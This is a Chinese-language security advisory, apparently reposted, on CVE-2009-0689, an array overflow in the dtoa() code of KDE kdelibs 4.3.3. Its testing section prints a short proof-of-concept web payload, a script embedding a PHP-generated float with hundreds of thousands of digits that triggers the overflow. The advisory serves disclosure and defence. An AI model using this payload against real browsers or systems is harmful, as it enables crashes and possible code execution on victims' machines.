KDE KDELibs库dtoa()实现数组溢出漏洞

文章由LinuxBoy分享于2019-04-02 11:04:47热评（473）

发布日期：2009-11-20
更新日期：2009-11-23

受影响系统：
KDE kdelibs 4.3.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 37080
CVE ID: CVE-2009-0689

KDE是一个为UNIX工作站设计的强大的开源图形桌面环境。

KDE KDELibs库的dtoa()实现中存在数组溢出漏洞。在src/lib/libc/gdtoa/gdtoaimp.h中：

- ---gdtoaimp.h---
...
#define Kmax 15
...
- ---gdtoaimp.h---

最大的Kmax长度为15，如果提供了更大的值（如17），程序就会溢出freelist数组。

<*来源：Maksymilian Arciemowicz （max@jestsuper.pl）

链接：http://marc.info/?l=bugtraq&m=125873272322298&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------

建议：
--------------------------------------------------------------------------------
厂商补丁：

KDE
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kde.org/

推荐文章：